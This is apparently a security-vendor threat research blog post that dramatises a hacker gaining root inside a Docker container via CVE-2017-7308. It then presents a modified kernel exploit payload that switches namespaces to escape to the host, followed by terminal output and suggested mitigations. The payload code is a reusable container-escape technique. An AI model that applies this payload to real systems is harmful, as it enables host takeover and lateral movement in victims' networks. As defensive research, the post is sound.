THREAT RESEARCH BLOG POST

The Route to Root: Container Escape Using Kernel Exploitation

 

March 4, 2019 | Nimrod Stoler

Imagine.

Just imagine that you are a black-hat hacker sitting in some seedy internet café in Europe, doing a dirty job on behalf of one of those secret, underground organizations we only hear about in the movies. You scan your servers and routers (well, they’re not actually yours, but you know) to see if any one of your smart, brute-force attacks got lucky and you have an open session inside one of those large enterprises you’ve been gunning for for so long.

You put an arrogant grin on your face. Your system is scanning thousands of web pages across the Internet, from corporate websites to social media and local newspapers, in an effort to find hints to corporate users’ passwords. It then builds a long dictionary of possible passwords per username and automatically tries them across corporate servers.

Suddenly, you notice some movement on one of your Brazilian servers (OK, not really “your” server). Your heart is pounding: it seems that one of the passwords your system came up with fits a database server on the other side of the globe. A few long seconds pass before your terminal spits out the long-awaited SSH lines:

Using username "john".
Welcome to Ubuntu 4.8.0 LTS (GNU/Linux 4.8.0-41-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

92 packages can be updated.
0 updates are security updates.

Last login: Thu Jan 21 16:28:41 2019 from 52.68.23.12
john@fb68d81579cf:~$

“Yes!” you shout, and the people around you in the café stop chatting and turn their annoyed faces toward you, but you don’t care.

You immediately recognize this IP as belonging to EnterpriseX, one of the large enterprises that you targeted, and now you have a shell on one of their machines!

john@fb68d81579cf:~$ uname -a
Linux fb68d81579cf 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 17:11:16 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

It seems you landed on a Linux machine on EnterpriseX and you are running as a user called John.

The machine has not been updated for quite some time and it is running kernel version 4.8.0-41. A few clicks later, you find you are on a MySQL server belonging to EnterpriseX, but you are logged in as a simple user.

After a brief check on the Internet, you realize: This must be your lucky day! This kernel version is vulnerable to a privilege escalation bug (CVE-2017-7308[i]), which also has a ready-made exploit online.

You can now almost feel the dollar bills touching your fingertips. You order another coffee, press a few more buttons on your (worn-out) keyboard to load the CVE-2017-7308 exploit to John’s machine. Then, with a noisy, triumphant “enter,” you run the exploit on EnterpriseX’s machine.

Gaining root would allow you to read, modify and delete all of the database records, attached devices and processes running on John’s machine. You can then continue to mine for credentials, access other applications running on the machine, access SSH keys to other machines, scan the network and, armed with the necessary credentials, move laterally to win over EnterpriseX’s priceless data.

The SSH session, now already running the exploit, starts spitting out the following lines:

[.] starting
[.] system has 2 processors
[.] checking kernel version
[.] kernel version '4.8.0-41-generic' detected
[~] done, version looks good
[.] done, should be root now
[.] checking if we got root
[+] got r00t ^_^

 

You get the long-awaited prompt:

root@fb68d81579cf:/#

 

Your fingers slide on the keyboard to check your root capabilities:

root@fb68d81579cf:/# cat /proc/self/status
Name:	cat
Umask:	0022
State:	R (running)
CapInh:	0000000000000000
CapPrm:	0000003fffffffff
CapEff:	0000003fffffffff
CapBnd:	0000003fffffffff
CapAmb:	0000000000000000
Seccomp:	2
……

“Mission accomplished,” you think to yourself…

But pretty soon you understand that all your wonderful, hacker-style trickery just got you inside a jail…

You check the process list:

root@fb68d81579cf:/# ps -aef
UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan30 pts/0    00:00:00 /bin/bash
root         16      1  0 Jan30 pts/0    00:00:00 ./poc
root         18     16  0 Jan30 pts/0    00:00:00 ./poc
root         19     18  0 Jan30 pts/0    00:00:00 sh -c /bin/bash
root         20     19  0 Jan30 pts/0    00:00:00 /bin/bash
root         52     20  0 12:07 pts/0    00:00:00 ps -aef

 

Where are all the processes?

You check the devices list:

root@fb68d81579cf:/dev# ls
console  fd    mqueue  ptmx  random  stderr  stdout  urandom  zero
core     full  null    pts   shm     stdin   tty

None of the important devices are here.

You check if you can write to the file system:

root@fb68d81579cf:/# echo 1 > /proc/sysrq-trigger
bash: sysrq-trigger: Read-only file system

 

The file system is read-only!

You almost had it. You almost reached the finish line. Everything was within your reach, but now it’s all gone. How did this happen to you?

Incident Analysis

What was it that our black-hat hacker was facing that she could not overcome? Although the exploit worked as it was designed to and promoted user John to a full-fledged root, it did not produce any meaningful results because our hacker took over a Docker Linux container running on EnterpriseX’s machine.

Linux containers take advantage of the fundamental virtualization concept of Linux namespaces. Namespaces are a feature of the Linux kernel that partitions kernel resources at the operating system level. Docker containers use Linux kernel namespaces to restrict any user, including root, from directly accessing the machine’s resources.

In a previous blog post, we wrote about hacking the Play-with-Docker environment and reaching the underlying host by loading kernel modules. By default, Docker withholds the CAP_SYS_MODULE capability from containers, which prevents a container from loading modules into the kernel. But here our hacker ran a privilege escalation exploit and is now root with all capabilities, including CAP_SYS_MODULE.
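To make the capability mask concrete, here is a minimal user-space sketch (not part of the original exploit) that tests individual bits of a hexadecimal mask such as the CapEff value printed by /proc/self/status earlier. The helper name cap_is_set and the enum names are hypothetical; the capability numbers are the ones defined in <linux/capability.h>.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>

/* Capability numbers as defined in <linux/capability.h>.
 * The enum names themselves are illustrative. */
enum {
    CAP_NUM_DAC_READ_SEARCH = 2,
    CAP_NUM_SYS_MODULE      = 16,
    CAP_NUM_SYS_ADMIN       = 21
};

/* Hypothetical helper: parse a hex mask such as the CapEff field of
 * /proc/<pid>/status and report whether capability number `cap` is set. */
bool cap_is_set(const char *hex_mask, unsigned cap)
{
    assert(hex_mask != NULL && cap < 64);
    uint64_t mask = strtoull(hex_mask, NULL, 16);
    return ((mask >> cap) & 1u) != 0;
}
```

Applied to the mask 0000003fffffffff from the status output above, the helper reports that CAP_SYS_MODULE (bit 16) is set, which is why the module-loading attempt that follows is at least worth trying.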

Perhaps not all is lost for our hacker friend. Let’s try to load a module then:

root@fb68d81579cf:/# insmod kernelmod.ko
insmod: ERROR: could not insert module kernelmod.ko: Operation not permitted

Although we have the required capabilities as root, the container environment does not permit us to load new modules into the kernel and abuse them in order to escape to the host.

Let’s try a second tactic to escape to the host. Make a new device pointing to the host’s hard drive and mount it inside the container:

root@fb68d81579cf:/dev# mknod xvda1 b 202 1
root@fb68d81579cf:/dev# ls
console  fd    mqueue  ptmx  random  stderr  stdout  urandom  zero
core     full  null    pts   shm     stdin   tty     xvda1

 

And then mount the device:

root@fb68d81579cf:/dev# mount xvda1 /mnt
mount: /mnt: permission denied.

As we can see, this route is also blocked by the Docker container[ii].

Other exploitable kernel functions, such as access to raw I/O and abuse of the CAP_DAC_READ_SEARCH capability (as used by the Shocker exploit), are completely blocked by the namespaced environment, which prevents the root superuser from abusing its privileges to escape to the underlying host.

The main reason we could not exploit the container any further is defense-in-depth. The idea of defense-in-depth is to provide multiple levels of defense for an attacker to breach, similar to how a castle relies on multiple defenses such as moats, thick walls and inner keeps. In this case, although the hacker breached the first line of defense and managed to escalate privileges to full root, the seccomp profile, set up as an extra layer as part of the defense-in-depth methodology, stopped the escape from container to host.
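The seccomp layer is visible from inside the container through the Seccomp field of /proc/self/status, which showed the value 2 in the output earlier. The following sketch, which is not part of the original post, extracts that field from the text of a status file. The function name seccomp_mode_from_status is hypothetical; the meaning of the values (0 disabled, 1 strict mode, 2 filter mode) follows the proc(5) manual page.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: extract the value of the "Seccomp:" field from the
 * text of /proc/<pid>/status. Returns 0 (disabled), 1 (strict mode) or
 * 2 (filter mode), or -1 if the field is not present. */
int seccomp_mode_from_status(const char *status_text)
{
    assert(status_text != NULL);
    const char *line = status_text;
    while (line != NULL && *line != '\0') {
        int mode;
        /* The field name is followed by whitespace and a decimal value. */
        if (sscanf(line, "Seccomp: %d", &mode) == 1)
            return mode;
        line = strchr(line, '\n');
        if (line != NULL)
            line++;               /* step past the newline */
    }
    return -1;
}
```

A result of 2 means a syscall filter is attached to the process, and that filter stays in place even after the process gains full root credentials.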

 

Sympathy for the Black-Hat

Nobody likes sad endings. We all want the hero of our story to win, even if she is a bad guy. So, we decided to help our black-hat hacker achieve her goal.

Let’s start with the current exploit. Below is the payload of the original exploit:

void get_root_payload(void) {
        /* Build root credentials and install them on the current task. */
        ((_commit_creds)(COMMIT_CREDS))(
                ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
        );
}

The original exploit calls the prepare_kernel_cred() function with 0 (NULL) as its argument. When passed NULL, the function creates a fresh credential structure with the uid and gid set to 0 (root) and all capability bits set. The commit_creds() function then installs the new credentials on the current task. We’ve already seen this at work and know it is not enough.

Our next step is to add the following lines after the commit_creds() call:

unsigned long long g = ((_find_task_vpid)(FIND_TASK))(1);
((_switch_task_namespaces)(SWITCH_TASK_NS))(( void *)g, (void *)INIT_NSPROXY);

The first line obtains a pointer to the task_struct structure of virtual process 1, i.e., the first process inside the container[iii]. The task_struct describes the executing program: open files, the process address space, pending signals, the process’s state, the namespaces the process is assigned to, etc.

Our goal is to change our process’s namespaces to those of the host. The Linux kernel stores a task’s namespaces in a special structure called nsproxy, so after obtaining the task_struct’s address, we call the switch_task_namespaces() function with the task_struct of process 1 and the address of the init_nsproxy structure, which contains the namespaces of the init process[iv].
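The effect of this call can be pictured with a small user-space model. The sketch below is only an illustration: the toy_ structures and function are hypothetical stand-ins, each namespace is represented by nothing more than an inode number, and the real kernel function does additional bookkeeping (locking and reference counting) that is omitted here.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-ins for the kernel structures; the field names are simplified
 * and each namespace is represented only by its inode number. */
struct toy_nsproxy {
    unsigned long mnt, uts, ipc, net;
};

struct toy_task {
    int pid;
    struct toy_nsproxy *nsproxy;   /* which set of namespaces the task uses */
};

/* Model of the pointer swap: afterwards the task refers to whatever
 * namespaces new_ns describes. */
void toy_switch_task_namespaces(struct toy_task *task,
                                struct toy_nsproxy *new_ns)
{
    assert(task != NULL && new_ns != NULL);
    task->nsproxy = new_ns;
}
```

In this model, pointing the container’s process 1 at the host’s set of namespaces is a single pointer assignment, which is why one call from kernel context is enough to give that process the host’s view.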

Each process’s namespaces may be accessed in /proc/<pid>/ns:

Current process namespaces:

root@fb68d81579cf:/# ls /proc/self/ns -lia
total 0
dr-x--x--x 2 root root 0 Feb  3 09:47 ./
dr-xr-xr-x 9 root root 0 Feb  3 09:47 ../
lrwxrwxrwx 1 root root 0 Feb  3 09:47 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 ipc -> 'ipc:[4026532478]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 mnt -> 'mnt:[4026532476]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 net -> 'net:[4026532481]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 pid -> 'pid:[4026532479]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 uts -> 'uts:[4026532477]'

 

Each virtual file above designates a different kernel namespace, for a total of seven namespaces. The numbers in brackets are the inode numbers that identify each namespace.

root@fb68d81579cf:/# ls /proc/1/ns -lia
total 0
dr-x--x--x 2 root root 0 Jan 31 16:52 ./
dr-xr-xr-x 9 root root 0 Jan 31 16:52 ../
lrwxrwxrwx 1 root root 0 Feb  3 09:47 cgroup -> 'cgroup:[4026531835]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 ipc -> 'ipc:[4026531839]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 mnt -> 'mnt:[4026531840]'
lrwxrwxrwx 1 root root 0 Jan 31 16:52 net -> 'net:[4026531957]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 pid -> 'pid:[4026532479]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 user -> 'user:[4026531837]'
lrwxrwxrwx 1 root root 0 Feb  3 09:47 uts -> 'uts:[4026531838]'

Above is the listing of namespaces for process 1 (remember, our exploit copied the namespaces of init_nsproxy into this process).

As you can see, some of the namespaces in process 1 have different inodes now. In the two listings, ipc (inter-process communication namespace), mnt (mount namespace), net (network namespace) and uts (hostname and domain name namespace) have changed their inodes, while the cgroup, pid and user entries show the same values in both.
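The same comparison can be done programmatically. The following sketch, not part of the original post, parses link targets in the format shown in the two listings and compares their inode numbers. The helper names ns_inode and same_namespace are hypothetical, and the sketch assumes both links refer to the same namespace type.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: extract the inode number from a namespace link
 * target such as "mnt:[4026532476]". Returns 0 if the text is malformed. */
unsigned long ns_inode(const char *link_target)
{
    assert(link_target != NULL);
    const char *bracket = strchr(link_target, '[');
    unsigned long inode = 0;
    if (bracket == NULL || sscanf(bracket, "[%lu]", &inode) != 1)
        return 0;
    return inode;
}

/* Two link targets of the same type refer to the same namespace when
 * they carry the same (valid) inode number. */
int same_namespace(const char *link_a, const char *link_b)
{
    unsigned long a = ns_inode(link_a);
    return a != 0 && a == ns_inode(link_b);
}
```

For example, comparing "mnt:[4026532476]" from the current process with "mnt:[4026531840]" from process 1 reports a difference, while the two pid entries compare equal.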

This gives us the opportunity to try nsenter, a utility that runs a program in the namespaces of another process[v]. Below we request a switch to all of process 1’s namespaces:

root@fb68d81579cf:/# nsenter --target 1 --all
nsenter: reassociate to namespace 'ns/cgroup' failed: Operation not permitted

 

Once again, defense-in-depth kicks in and stops us from using nsenter. Specifically, the Docker seccomp profile does not allow calls to the setns syscall, which the nsenter application relies on.
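For reference, the user-space operation that gets blocked here looks roughly like the sketch below: open a namespace file and pass the descriptor to setns. This is an illustration rather than nsenter’s actual source code. The function name join_namespace is hypothetical, and the syscall is invoked through syscall() only so that the sketch does not depend on the libc wrapper being declared.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Hypothetical helper: try to join the namespace referenced by ns_path
 * (for example "/proc/1/ns/mnt"). Returns 0 on success or a negative
 * errno value on failure. */
int join_namespace(const char *ns_path)
{
    assert(ns_path != NULL);
    int fd = open(ns_path, O_RDONLY | O_CLOEXEC);
    if (fd < 0)
        return -errno;

    /* Raw setns(2) call; an nstype of 0 accepts any namespace type. */
    long rc = syscall(SYS_setns, fd, 0);
    int saved_errno = errno;
    close(fd);
    return rc == 0 ? 0 : -saved_errno;
}
```

Inside a container whose seccomp profile blocks setns, as in the nsenter attempt above, a call such as join_namespace("/proc/1/ns/mnt") would be expected to fail with -EPERM, matching the “Operation not permitted” message.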

After some trial and error we arrived at the following exploit code, which calls the setns syscall from the kernel exploit instead of from the container:

long fd = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
((_sys_setns)(SYS_SETNS))( fd, 0);

fd      = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
((_sys_setns)(SYS_SETNS))( fd, 0);

 

The first line prepares the parameter for the setns syscall. It uses the kernel’s open routine (do_sys_open) to open the virtual file of process 1’s mnt (mount) namespace, located in /proc/1/ns. The call returns a file descriptor, which is stored in the fd variable.

The second line passes the file descriptor to the setns syscall, which performs the required namespace change. The remaining two lines repeat the same steps for the pid namespace.

The entire exploit payload is therefore:

void get_root_payload( void) {

        ((_commit_creds)(COMMIT_CREDS))(
                ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)
        );

        // -------- NAMESPACE DOCKER EXPLOIT  --------
        // copy nsproxy from init_nsproxy to pid 1 of the container
        unsigned long long g = ((_find_task_vpid)(FIND_TASK))(1);

        // now, do the magic.... !!!! Simple black magic doesn't work on current process!!!!
        ((_switch_task_namespaces)(SWITCH_TASK_NS))(( void *)g, (void *)INIT_NSPROXY);

        // prepare the two namespace FDs by opening the respective files
        long fd = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/mnt", O_RDONLY, 0);
        ((_sys_setns)(SYS_SETNS))( fd, 0);

        fd      = ((_do_sys_open)(DO_SYS_OPEN))( AT_FDCWD, "/proc/1/ns/pid", O_RDONLY, 0);
        ((_sys_setns)(SYS_SETNS))( fd, 0);
}

Changing the mnt and pid namespaces is enough to achieve the desired escape to the host.

The above code can be added to an exploit for any future privilege escalation vulnerability found in the Linux kernel in order to escape a containerized environment.

Back in Black

You order another coffee and gaze for a few seconds through the large coffee shop window. Then you take a last look at your new exploit. It is ready for prime time, so you load it to EnterpriseX’s machine and run it with a humble “enter” this time.

[.] starting
[.] system has 2 processors
[.] checking kernel version
[.] kernel version '4.8.0-41-generic' detected
[~] done, version looks good
[.] done, should be root now
[.] checking if we got root
[+] got r00t ^_^

 

With a trembling hand you check to see if you have root access to the host:

root@fb68d81579cf:/# ls /
bin    dev   initrd.img      lib64       mnt   proc  sbin  sys  var
boot   etc   initrd.img.old  lost+found  mnt1  root  snap  tmp  vmlinuz
cdrom  home  lib             media       opt   run   srv   usr  vmlinuz.old

 

You check the process list:

root@fb68d81579cf:/# ps -aef
UID         PID   PPID  C STIME TTY          TIME CMD
root          1      0  0 Jan31 ?        00:00:08 /sbin/init auto noprompt
root          2      0  0 Jan31 ?        00:00:00 [kthreadd]
root          3      2  0 Jan31 ?        00:00:02 [ksoftirqd/0]
root          5      2  0 Jan31 ?        00:00:00 [kworker/0:0H]
root          7      2  0 Jan31 ?        00:00:08 [rcu_sched]
root          8      2  0 Jan31 ?        00:00:00 [rcu_bh]
root          9      2  0 Jan31 ?        00:00:00 [migration/0]
root         10      2  0 Jan31 ?        00:00:00 [lru-add-drain]
root         11      2  0 Jan31 ?        00:00:00 [watchdog/0]
root         12      2  0 Jan31 ?        00:00:00 [cpuhp/0]
root         13      2  0 Jan31 ?        00:00:00 [cpuhp/1]
root         14      2  0 Jan31 ?        00:00:00 [watchdog/1]
root         15      2  0 Jan31 ?        00:00:00 [migration/1]
root         16      2  0 Jan31 ?        00:00:00 [ksoftirqd/1]
root         18      2  0 Jan31 ?        00:00:00 [kworker/1:0H]
root         19      2  0 Jan31 ?        00:00:00 [kdevtmpfs]
root         20      2  0 Jan31 ?        00:00:00 [netns]
root         21      2  0 Jan31 ?        00:00:00 [khungtaskd]
root         22      2  0 Jan31 ?        00:00:00 [oom_reaper]
root         23      2  0 Jan31 ?        00:00:00 [writeback]

 

Yes. You have access to the underlying host. All processes. All files. All devices.

You now own the initial foothold… EnterpriseX’s network is next[vi]!

Conclusion and Suggested Mitigations

In a previous blog post, we showed how an attacker can exploit a privileged container and use it to escape to the underlying host. In contrast, this blog post shows how Docker containers’ defense-in-depth strategy temporarily stopped our black-hat hacker from escaping to the underlying host. The hacker was using an off-the-shelf Linux kernel exploit that failed to escape the containerized environment it was jailed in.

We then expanded the exploit’s payload to include code that manipulates the container’s namespaces by overwriting the namespaces of the container’s process 1 with the host’s namespaces. The exploit finishes by calling the setns syscall, which switches the current process into the namespaces of process 1, which are now the host’s namespaces, practically tearing down the namespace walls between container and host and accomplishing a full escape to the host.

A first mitigation would be to use a non-generic kernel version. Devising a working exploit for a known vulnerability is difficult for many reasons, one of them being KASLR (kernel address space layout randomization), whose bypass is usually a challenge for exploit writers. Using a generic kernel version for production applications is a bad idea because it makes the KASLR bypass easier.

A second mitigation concerns the kernel code. Since the entire exploit runs in the context of the Linux kernel, we need to think of changes to the Linux kernel itself. We suggest changing the switch_task_namespaces() kernel function in kernel/nsproxy.c, which we used in our exploit, to an inline function, making it more difficult for an attacker to find the exact location of the nsproxy structure inside the randomized task_struct structure[vii].

 

[i] This Linux kernel bug was discovered by Andrey Konovalov

 

[ii] Although the container allows creating new devices using mknod, it allows neither reading from nor writing to key devices. This is accomplished by setting strict device cgroups and then locking the file system to read-only as part of the defense-in-depth strategy.

 

[iii] For more information on task_struct and Linux kernel processes, see https://notes.shichao.io/lkd/ch3/

 

[iv] The Linux kernel hangs if we try to change the running process’s namespaces, so we had to use another tactic. We imported the init_nsproxy of the host processes to the container’s process 1 and then changed namespaces for the current process to the namespaces of process 1 within the container.

 

[v] See http://man7.org/linux/man-pages/man1/nsenter.1.html

 

[vi] Justin Cormack from Docker Security rightly commented that the Docker seccomp profile is still active after the exploit has run and continues to block certain syscalls. Although our hacker reached the root namespaces, some operations are still blocked when called from within the container’s processes.

 

[vii] We are aware that other exploit methods are available to escape the containerized environment, for example, using the kernel exploit to reset the filesystem’s read-only flag to read/write. We believe a thorough examination is in order; however, it is not within the scope of this blog post.

 
